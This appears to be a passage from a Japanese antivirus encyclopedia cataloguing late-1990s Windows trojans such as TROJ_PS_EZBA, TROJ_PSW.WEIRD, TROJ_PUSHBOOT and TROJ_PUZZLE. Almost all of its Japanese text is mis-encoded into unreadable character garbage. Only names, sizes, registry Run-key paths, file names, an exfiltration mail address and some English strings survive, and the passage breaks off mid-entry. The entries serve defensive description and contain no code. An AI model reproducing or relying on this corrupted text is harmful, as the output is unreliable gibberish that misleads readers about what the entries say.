¤ì¤ëŽ¡(¤³¤Î¥¢¥«¥¦¥ó¥È¤ÏWEB-BASE¤Î¥Õ¥ê¡¼¥á¡¼¥ë¥µ¡¼¥Ó¥¹ ¤òÍøÍѤ·¤Æ¤¤¤ëŽ¡)¤³¤¦¤·¤Æ ¤³¤Î¥×¥í¥°¥é¥à¤ÎºîÀ®¼Ô¤Ï¥æ¡¼¥¶¡¼¤Î¥¢¥«¥¦¥ó¥È¤È¥Ñ¥¹¥ï ¡¼¥É¤ò¼èÆÀ¤¹¤ëŽ¡
È÷¡¡¡¡¹Í:¡¡¤â¤·¤³¤ÎProMail¤ò»È¤Ã¤¿¤³¤È¤¬¤¢¤ëޤ¤Þ¤¿¤Ï
»È¤Ã¤Æ¤¤¤ë¤Î¤Ç¤¢¤ì¤Ðޤ¥á¡¼¥ë¥¢¥«¥¦¥ó¥È¤Ï¤³¤Î¥È¥í¥¤¤ÎÌÚ ÇϤκî¼Ô¤ä¤½¤Î¤Û¤«¤Î¥Ï¥Ã¥«¡¼¤¿¤Á¤ËÉÔÀµ¤ËÍøÍѤµ¤ì¤ë²Ä ǽÀ­ ¤¬¹â¤¤¤Ç¤¹Ž¡Ä¾¤Á¤Ë¥Ñ¥¹¥ï¡¼¥É¤òÊѹ¹¤¹¤ë¤³¤È¤ò¤ª´«¤á¤·¤Þ ¤¹Ž¡ _

TROJ_PS_EZBA


̾¡¡¡¡¾Î:TROJ_PS_EZBA

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN 32

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ë
Ž¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¤³¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤ÈޤE-mail¤Ç¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï ¡¼¥¯¤Î¥Ñ¥¹¥ï¡¼¥É¤¬¤³¤Î¥×¥í¥°¥é¥à¤ÎºîÀ®¼Ô¤ËÁ÷¿®¤µ¤ì¤ëŽ¡ ¤³¤Î¤¿¤á¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯¤Î¥»¥­¥å¥ê¥Æ¥£¤¬¶¼¤«¤µ¤ì ¤ëŽ¡ -¡¡TROJ_PW_STEAL¤Ï¿ô¿¤¯¤Î°¡¼ï¤¬Â¸ºß¤¹¤ëŽ¡¤³¤ì¤é¤Ïޤ WININI.INI¥Õ¥¡¥¤¥ë¤Î[RUN] ¤Þ¤¿¤Ï [LOAD] ¥°¥ë¡¼¥×¤«Ž¤¥ì ¥¸¥¹¥È¥ê¤ò²þÊѤ·¤Æ¼«Æ°Åª¤Ë¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤µ¤»¤ëŽ¡

TROJ_PS_EZBA-1


̾¡¡¡¡¾Î:TROJ_PS_EZBA-1

ÊÌ¡¡¡¡Ì¾:TROJ_PS_EZޤ TROJ_PS_BA

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:25ޤ606 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ë
Ž¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¤³¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤ÈޤE-mail¤Ç¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï ¡¼¥¯¤Î¥Ñ¥¹¥ï¡¼¥É¤¬¤³¤Î¥×¥í¥°¥é¥à¤ÎºîÀ®¼Ô¤ËÁ÷¿®¤µ¤ì¤ëŽ¡ ¤³¤Î¤¿¤á¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯¤Î¥»¥­¥å¥ê¥Æ¥£¤¬¶¼ ¤«¤µ¤ì¤ëŽ¡ -¡¡TROJ_PW_STEAL¤Ï¿ô¿¤¯¤Î°¡¼ï¤¬Â¸ºß¤¹¤ëŽ¡¤³¤ì¤é¤Ïޤ WININI.INI¥Õ¥¡¥¤¥ë¤Î[RUN] ¤Þ¤¿¤Ï [LOAD] ¥°¥ë¡¼¥×¤«Ž¤¥ì ¥¸¥¹¥È¥ê¤ò²þÊѤ· ¤Æ¼«Æ°Åª¤Ë¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤µ¤»¤ëŽ¡
È÷¡¡¡¡¹Í:

TROJ_PS_SFXEJ


̾¡¡¡¡¾Î:TROJ_PS_SFXEJ

ÊÌ¡¡¡¡Ì¾:TROJAN.SFX.EJ

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:115948 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:1998ǯ

¾Ü¡¡¡¡ºÙ:¡¡-¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢
¤ëŽ¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¤³¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤ÈޤE-mail¤Ç¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï ¡¼¥¯¤Î¥Ñ¥¹¥ï¡¼¥É¤È¥æ¡¼¥¶¡¼¾ðÊ󤬤³¤Î¥×¥í¥°¥é¥à¤ÎºîÀ® ¼Ô¤ËÁ÷¿®¤µ¤ì¤ëŽ¡¤³¤Î¤¿¤á¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯¤Î¥» ¥­¥å¥ê¥Æ¥£¤¬¶¼¤«¤µ¤ì¤ëŽ¡
-¡¡¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ìޤ³èư¤ò³«»Ï¤¹¤ë¤È¡¢C:\windows¤Ë"
Threed.vbx"¡¢"Vbwfind.dll"¤ª¤è¤Ó"Win32.exe"¤Î3¸Ä¤Î¥Õ ¥¡¥¤¥ë ¤ò¥³¥Ô¡¼¤¹¤ë¡£¤Þ¤¿¡¢Æ±¥Ç¥£¥ì¥¯¥È¥ê¾å¤Î"win.ini"¥Õ¥¡¥¤
¥ë¤Ë"Run=C:\windows\win32.exe"¤È¤¤¤¦Ì¿Îá¤ò½ñ¤­²Ã¤¨
¤ë¡£¤³¤Î·ë²Ì¡¢OS¤¬µ¯ ư¤¹¤ë¤¿¤Ó¤Ë¡¢¥¦¥¤¥ë¥¹¤¬ºîÀ®¤·¤¿"win32.exe"¤¬µ¯Æ°¤¹¤ë Ž¡ -¡¡¡ÉCRACKGOD@IX.netcom.com¡É¤È¤¤¤¦¥¢¥É¥ì¥¹¤ËÂФ·¤Æ¥æ ¡¼¥¶¡¼¾ðÊó¤ò´Þ¤à¥á¡¼¥ë¤òÁ÷¿®¤¹¤ë¡£¥á¡¼¥ë¤Ë¤Ï"I AM OK AND HOWARE YOU"¤È¤¤¤¦Ê¸»úÎó¤¬´Þ¤Þ¤ì¤Æ¤¤¤ë¡£
»³²:
-¡¡¥×¥é¥¤¥Ð¥·¡¼¤¬¿¯³²¤µ¤ì¤ëŽ¡
È÷¡¡¡¡¹Í:

TROJ_PSTEAL7


̾¡¡¡¡¾Î:TROJ_PSTEAL7

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1ޤ234¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
- ´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢WIN.INI¥Õ¥¡¥¤¥ë¤Î[Load]¤Þ ¤¿¤Ï[RUN]¥¨¥ó¥È¥ê¡¼¤Ë¥¦¥¤¥ë¥¹¤¬¥³¥Ô¡¼¤µ¤ì¤ë¡£¤¢¤ë¤¤ ¤Ï¡¢¥ì¥¸¥¹¥È¥ê¤Ë¥³¥Ô¡¼¤µ¤ì¤ë¤³¤È¤â¤¢¤ë¡£
»³²:
- ¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ê¡¢Â¾¤Î¥Õ¥¡¥¤¥ë¤ä¥·¥¹¥Æ ¥à¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£¤·¤«¤·¡¢¼Â¹Ô¸å¡¢E-mail¤Ç¥í ¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯¤Î¥Ñ¥¹¥ï¡¼¥É¤¬¥¦¥¤¥ë¥¹ºîÀ®¼Ô¤ËÁ÷ ¿®¤µ¤ì¤ë¤¿¤á¡¢¤½¤Î¥Ñ¥¹¥ï¡¼¥É¤ò»È¤Ã¤Æ¥·¥¹¥Æ¥à¤Ë¿¯Æþ¤µ ¤ì¤ë´í¸±À­¤¬¤¢¤ê¡¢¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯¤Î¥»¥­¥å¥ê¥Æ¥£ ¤¬¤ª¤Ó¤ä¤«¤µ¤ì
È÷¡¡¡¡¹Í:

TROJ_PSW.COCED


̾¡¡¡¡¾Î:TROJ_PSW.COCED

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win3.11/9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:9728 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
¾¤Î¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤. ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥·¥¹¥Æ¥à¡¦¥ì¥¸¥¹¥È¥ê¤Î²þ ÊѤò¹Ô¤Ê¤¦¡£¤¹¤Ê¤ï¤Á¡¤¥ì¥¸¥¹¥È¥êÃæ¤ÎICQ¤Î¥»¥Ã¥Æ¥£¥ó¥° ¤òÊѹ¹¤·¡¤¥¦¥¤¥ë¥¹¤Ø¤Î¥Ñ¥¹¤òÀßÄꤹ¤ë¡£¤½¤Î¤¿¤á¡¤ICQ¤¬ ¼Â¹Ô¤µ¤ì¤ë¤¿¤Ó¤Ë¡¤¥¦¥¤¥ë¥¹¤¬µ¯Æ°¤µ¤ì¤ë¤³¤È¤È¤Ê¤ë¡£¤³ ¤Î·ë²Ì¡¤¥Ï¥Ã¥«¡¼¤¬¥æ¡¼¥¶¤Î¥·¥¹¥Æ¥à¤Ë¿¯Æþ¤¹¤ë¤³¤È¤¬²Ä ǽ¤È¤Ê¤ë¡£

TROJ_PSW.COCED3


̾¡¡¡¡¾Î:TROJ_PSW.COCED3

ÊÌ¡¡¡¡Ì¾:¤Ê¤·

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win3.11/9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:10,240 bytes

¾Ü¡¡¡¡ºÙ:¡¡
¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£Â¾¤Î¥Õ¥¡¥¤ ¥ë¤Ø¤Î´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£ ¡¡¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϵ¯Æ°¤µ¤ì¤ë¤È¥Þ¥·¥ó¤Î¥æ¡¼¥¶¡¼¤¬»È ÍѤ·¤¿¥Ñ¥¹¥ï¡¼¥É¤òÅð¤ß¡¢¥á¡¼¥ë¤Ç¥¦¥¤¥ë¥¹ºî¼Ô¤ËÁ÷¿®¤· ¤Þ¤¹¡£¤Þ¤¿¥ì¥¸¥¹¥È¥ê¤Î²þÊѤò¹Ô¤¤¡¢¥·¥¹¥Æ¥àµ¯Æ°Ëè¤Ë¼« ¤é¤¬¼«Æ°¼Â¹Ô¤µ¤ì¤ë¤è¤¦ÀßÄꤷ¤Þ¤¹¡£

TROJ_PSW.WEIRD


̾¡¡¡¡¾Î:TROJ_PSW.WEIRD

ÊÌ¡¡¡¡Ì¾:TROJ.PSW.KUANG2ޤ K2PS.EXE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:7ޤ680 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:99/5

¾Ü¡¡¡¡ºÙ:¥À¥¤¥ä¥ë¥¢¥Ã¥×¾ðÊó¤òÅð¤à¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á
¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ ¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤¿¤é¡¢¤Þ¤º¡¢¥ª¥ê¥¸¥Ê¥ë¤Î¥Õ¥¡
¥¤¥ë¤òŽ¤Æ±¤¸Ì¾Á°¤Ç:\Windows\System¥Ç¥£¥ì¥¯¥È¥ê¤Ë
Ê£À½¤¹¤ë¡£¤½¤·¤Æ¡¢¥ì¥¸¥¹¥È¥ê¤ËÅÐÏ¿¤·¤Æ¡¢¥Þ¥·¥óµ¯Æ°»þ ¤Ë¡¢Ëè²ó¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ë¡£ Îã)¡¡k2ps.exe¤È¤¤¤¦¥Õ¥¡¥¤¥ë̾¤À¤Ã¤¿¾ì¹ç \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run¤Ëk2ps.task¤È¤¤¤¦¥­¡¼¤È¡ÈC:\WINDOWS
\SYSTEM\K2ps.exe¡É¤È¤¤¤¦ÃͤòÅÐÏ¿¤¹¤ë¡£ -¡¡Windows¤¬ºÆµ¯Æ°¤µ¤ì¤ë¤È¡¤K2PS.EXE¤Ï¼«Æ°Åª¤Ë¼Â¹Ô¤µ ¤ì¡¤Windows\System¥Ç¥£¥ì¥¯¥È¥ê¤ËK2PS.CFG¤È¤¤¤¦±£¤·¥Õ ¥¡¥¤¥ë¤òºîÀ®¤·Ž¤¥æ¡¼¥¶¤ÎIDޤ¥Ñ¥¹¥ï¡¼¥Éޤ¥³¥ó¥Ô¥å¡¼¥¿¡¼Ì¾ ¤È¸½ºß¤ÎIP¥¢¥É¥ì¥¹¤Î¾ðÊó¤ò°Å¹æ²½¤µ¤ì¤ÆÊݸ¤¹¤ë¡£ ¡Ý¤³¤Î¥È¥í¥¤¤ÎÌÚÇÏ¥×¥í¥°¥é¥à¤Ï¡¢RASAPI32.DLL¤Ë¤ª¤±¤ë µ¡Ç½¤ò»ÈÍѤ·¤Æ¡¢¾ï¤Ë¥æ¡¼¥¶¤Î¥À¥¤¥ä¥ë¥¢¥Ã¥×¥Í¥Ã¥È¥ï ¡¼¥¯Àܳ¤ò´Æ»ë¤·¤Æ¤¤¤ëŽ¡ - ¥æ¡¼¥¶¡¼¤¬¥À¥¤¥¢¥ë¥¢¥Ã¥×¤Ç¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ ¤¹¤ë¤Èޤ¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϡ¤¼«Æ°Åª¤Ë¥Ö¥é¥¸¥ë¤Ë¤¢¤ëÅÅ»Ò ¥á¡¼¥ë¥µ¡¼¥Ð¤ËÀܳ¤·¡¤"K2ps.CFG"¥¡¥¤¥ë¤ËÊݸ¤µ¤ì¤¿¾ð Êó¤òÅŻҥ᡼¥ë¤Çޤ¤¢¤ëÆÃÄê¤Î¥á¡¼¥ë¥¢¥É¥ì¥¹(ÆüËܥɥᥤ ¥ó)¤ËÁ÷¿®¤·¤è¤¦¤È¤¹¤ëŽ¡¡£ ¢¨¾åµ­¤Ï¥Õ¥¡¥¤¥ë̾¤¬K2PS.EXE¤Î¾ì¹ç¤ÇÀâÌÀ¤·¤Æ¤¤¤Þ¤¹Ž¡¤· ¤«¤·¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϥե¡¥¤¥ë̾¤òÊѹ¹¤·¤Æ¤âŽ¤Æ°ºî¤¬²Ä ǽ¤Ç¤¹¤Î¤Çޤº£¸å¥Õ¥¡¥¤¥ë̾¤¬Êѹ¹¤µ¤ì¤Æ¤Ð¤é¤Þ¤«¤ì¤ëÉÝ¤ì ¤¬¤¢¤ê¤Þ¤¹Ž¡¥Õ¥¡¥¤¥ë̾¤¬¡ÉK2ps.exe¡É¤Ç¤Ê¤¤¾ì¹çޤÎ㤨¤Ð ¡É123.exe¡É¤Ç¤¢¤ë¾ì¹ç¤Ïޤ¾åµ­¤Î¡ÉK2ps¡É¤ÎÉôʬ¤ò¡É123¡É ¤ÈÆÉ¤ßÂØ¤¨¤Æ¤¯¤À¤µ¤¤Ž¡
È÷¡¡¡¡¹Í:-¡¡¥Õ¥¡¥¤¥ë¤ÎÃæ¤ËCoded by Weird¤È¤¤¤¦Ê¸»úÎó
¤¬¤¢¤ëŽ¡ -¡¡32¥Ó¥Ã¥È¤Î¼Â¹Ô·Á¼°¥Õ¥¡¥¤¥ë¤ÇWindows 95/98¾å¤Ç¤Î¤ß ưºî¡£Windows NT¾å¤Ç¤Ïưºî¤·¤Ê¤¤¡£ -¡¡¤â¤·¤³¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤Æ¤·¤Þ¤Ã¤¿¾ì¹ç¡¤¤¹¤°¤Ë¡¤¥Ñ ¥¹¥ï¡¼¥É¤ä¥À¥¤¥¢¥ë¥¢¥Ã¥×¥¢¥«¥¦¥ó¥È¤òÊѹ¹¤¹¤ë¤³¤È¤¬½Å ÍפǤ¹¡£

TROJ_PSW_ZUX


̾¡¡¡¡¾Î:TROJ_PSW_ZUX

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:396,293 / 11,264¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:
- ¼Â¹Ô¤µ¤ì¤¿¥ª¥ê¥¸¥Ê¥ë¡¦¥×¥í¥°¥é¥à¤Ï¡¢Ä̾ï¤Î̵ ³²¤Ê¥×¥í¥°¥é¥à¤Ç¤¢¤ë¤Õ¤ê¤ò¤¹¤ë¡£¤¹¤°¤ì¤¿¥¤¥ó ¥¿¡¼¥Õ¥§¥¤¥¹¤ò¤â¤Ä¤¬¡¢¥æ¡¼¥¶¡¼¤¬¤³¤ì¤ò¼Â¹Ô¤· ¤Æ¤¤¤ë¤¦¤Á¤Ë¡¢¥¦¥¤¥ë¥¹¤ÏWindows¤ÎSystem¥Õ¥©¥ë ¥À¤Ë¡Éwinexe.exe¡É¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¡¢HKEY_ USERS\Default\Software\Mirabils\ICQ\Agent\ Apps\Run¤Ë¥­¡¼¤òÀßÄꤹ¤ëŽ¡¤³¤ì¤Ë¤è¤Ã¤ÆŽ¤ICQ¤¬µ¯ ư¤µ¤ì¤¿¤È¤­¤ËƱ»þ¤Ë¼Â¹Ô¤µ¤ì¤ëŽ¡ - ¤³¤Î¥×¥í¥°¥é¥à¤ÏICQ¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ë¤È¤­¤Ë¤À ¤±Í­¸ú¤À¤¬¡¢ICQ¤¬¤Ê¤¤¤È¤­¤Ë¤â¡¢¤ä¤Ï¤êƱ¤¸¥ì¥¸¥¹¥È¥ê¤ò ºîÀ®¤¹¤ë¡£¤Þ¤¿¡¢¥ì¥¸¥¹¥È¥ê¤ÎHKEY_CURRENT_USERS¤Ë¤âƱ ¤¸ÃͤòºîÀ®¤¹¤ë¡£ - ·Ù¹ð¥×¥í¥°¥é¥à¤ò̵¸ú¤Ë¤¹¤ë¤¿¤á¡¢¥¦¥¤¥ë¥¹¤¬¥í¡¼¥É¤µ ¤ì¤Æ¤â¡¢·Ù¹ð¥á¥Ã¥»¡¼¥¸¤Ïɽ¼¨¤µ¤ì¤Ê¤¤¡£ - ¥ª¥ê¥¸¥Ê¥ë¡¦¥Õ¥¡¥¤¥ë¤Î¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤Ï396,293¥Ð¥¤ ¥È¡¢¼Â¹Ô¸å¤ËºîÀ®¤µ¤ì¤ë¥Õ¥¡¥¤¥ë¡Êwinexe.exe¡Ë¤Ï11,264 ¥Ð¥¤¥È¡£Æó¤Ä¤Î¥Õ¥¡¥¤¥ë¤Ï¼Â¼ÁŪ¤ËƱ¤¸Ç˲õ³èư¤ò¹Ô¤Ê ¤¦¡£¤Þ¤¿¡¢Á°¼Ô¤Ï¥°¥é¥Õ¥£¥Ã¥¯¤ò»È¤Ã¤¿¥¤¥ó¥¿¡¼¥Õ¥§¥¤¥¹ ¤òɽ¼¨¤¹¤ë¤¬¡¢¸å¼Ô¤Ïɽ¼¨¤·¤Ê¤¤¡£

TROJ_PUSHBOOT


̾¡¡¡¡¾Î:TROJ_PUSHBOOT

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:4,220¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÂæÏÑ

¾Ü¡¡¡¡ºÙ:¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ê¡¢¥æ¡¼¥¶¡¼¤¬ÉÔ
Ãí°Õ¤Ë¼Â¹Ô¤·¤Æ¤·¤Þ¤¦¤È¡¢¥¦¥¤¥ë¥¹¤Ï¡¢¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¤È £Æ£Á£Ô¥»¥¯¥¿¡¼¤ò½ñ¤­´¹¤¨¤è¤¦¤È¤¹¤ë¡£¤³¤Î¤È¤­¡¢²èÌÌ¤Ë ¤Ï¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ÎÆâÍÆ¤ò¹¹¿·¤·¤è¤¦¤È¤·¤Æ¤¤¤ë¤È¤Î¥á ¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë¤³¤È¤¬Â¿¤¤¡£½ñ¤­´¹¤¨¸å¤Ï¡¢¤â¤Ï ¤ä¡¢Êݸ¤µ¤ì¤Æ¤¤¤ë¥Ç¡¼¥¿¤ò¥ê¥«¥Ð¥ê¤¹¤ë¤³¤È¤Ï¤Ç¤­¤Ê ¤¤¡£
»³²:
¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¤È£Æ£Á£Ô¥»¥¯¥¿¡¼¤ò½ñ¤­´¹¤¨¡¢Êݸ¤µ¤ì¤Æ ¤¤¤ë¥Ç¡¼¥¿¤òÆÉ¤ß¹þ¤á¤Ê¤¯¤¹¤ë¡£
È÷¡¡¡¡¹Í:CMOS¤ÎBIOS¾ðÊó¤ò½ñ¤­´¹¤¨¡¢¥³¥ó¥Ô¥å¡¼¥¿¤ÎÀß
Äê¤òÊѤ¨¤è¤¦¤È¤¹¤ë¡£

TROJ_PUZZLE


̾¡¡¡¡¾Î:TROJ_PUZZLE

ÊÌ¡¡¡¡Ì¾:PUZZLE, Sliver v1.0

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows95/98/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:245248bytes

¾Ü¡¡¡¡ºÙ:¡Ý¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤À¤¬Ç˲õŪ¤Ê
³èư¤Ï̵¤¤¡£ ¼Â¹Ô¤¹¤ë¤È²èÌ̤ò12ʬ³ä¤·¥Ñ¥º¥ë¤Ë¤·¤Æ¤·¤Þ¤¦¡£¥Ñ¥º¥ë¤ò ²ò¤¯¤Þ¤Ç¥Þ¥·¥ó¤Ï»ÈÍѤǤ­¤Ê¤¤¡£
¤Þ¤¿°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë:
"Oops, looks like somebody does not like you very much! You have to finish this sliding tile puzzle before you can continue whatever it is you are doing! Use the cursor keys to move the pieces (black piece is the empty one).¡É ¤³¤Î¥×¥í¥°¥é¥à¤Ï¡¢¥Ñ¥º¥ë¤ò´°À®¤µ¤»¤Ê¤¤¸Â¤ê½ªÎ»¤¹¤ë¤³ ¤È¤¬¤Ç¤­¤Ê¤¤¡£¶¯À©½ªÎ»¤·¤è¤¦¤È¤·¤Æ¤â¡¢¥¿¥¹¥¯¥Þ¥Í¡¼¥¸ ¥ã¤Ë¤³¤Î¥×¥í¥°¥é¥à¤Ïɽ¼¨¤µ¤ì¤Ê¤¤¤Î¤Ç¡¢½ªÎ»¤µ¤»¤ë¤³¤È ¤¬¤Ç¤­¤Ê¤¤¤«¤é¤À¡£¶¯À©Åª¤Ë½ªÎ»¤µ¤»¤ë¤Ë¤ÏÅŸ»¤òÍî¤È¤¹ ¾¤Ê¤¤¡£ ¥Ñ¥º¥ë¤ò²ò¤¤¤Æ²èÌ̤ò¸µ¤ËÌ᤹¤È¥È¥í¥¤¤ÎÌÚÇϤϽªÎ»¤·¡¢ ¥Þ¥·¥ó¤ÏÄ̾ï¤Ë»ÈÍѲÄǽ¤È¤Ê¤ë¡£
¥Ñ¥º¥ë¤¬´°À®¤¹¤ë¤È°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë:
"Congratulations, you made it...You can now continue whatever it was you doing...Slider was made by Andy
Feys using Delphi 3.e-mail : andy_feys@hotmail.com

home-page :http://www.fortunecity.com/skyscraper/
binary/44/¡É

TROJ_PW_STEAL


̾¡¡¡¡¾Î:TROJ_PW_STEAL

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1234 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¤È¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢
¤ëŽ¡´¶À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¤³¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤ÈޤE-mail¤Ç¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï ¡¼¥¯¤Î¥Ñ¥¹¥ï¡¼¥É¤¬¤³¤Î¥×¥í¥°¥é¥à¤ÎºîÀ®¼Ô¤ËÁ÷¿®¤µ¤ëŽ¡¤³ ¤Î¤¿¤á¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯¤Î¥»¥­¥å¥ê¥Æ¥£¤¬¶¼¤« ¤µ¤ì¤ëŽ¡ -¡¡TROJ_PW_STEAL¤Ï¿ô¿¤¯¤Î°¡¼ï¤¬Â¸ºß¤¹¤ëŽ¡¤³¤ì¤é¤Ïޤ WININI.INI¥Õ¥¡¥¤¥ë¤Î[RUN] ¤Þ¤¿¤Ï [LOAD] ¥°¥ë¡¼¥×¤«Ž¤¥ì ¥¸¥¹¥È¥ê¤ò²þÊѤ· ¤Æ¼«Æ°Åª¤Ë¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤µ¤»¤ëŽ¡
È÷¡¡¡¡¹Í:

TROJ_QDEL137


̾¡¡¡¡¾Î:TROJ_QDEL137

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS/ Win16 / Win32

¥¦¥¤¥ë¥¹¥µ¥¤¥º:3,104 bytes

¾Ü¡¡¡¡ºÙ:¡Ý¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£¥È¥í¥¤¤Î
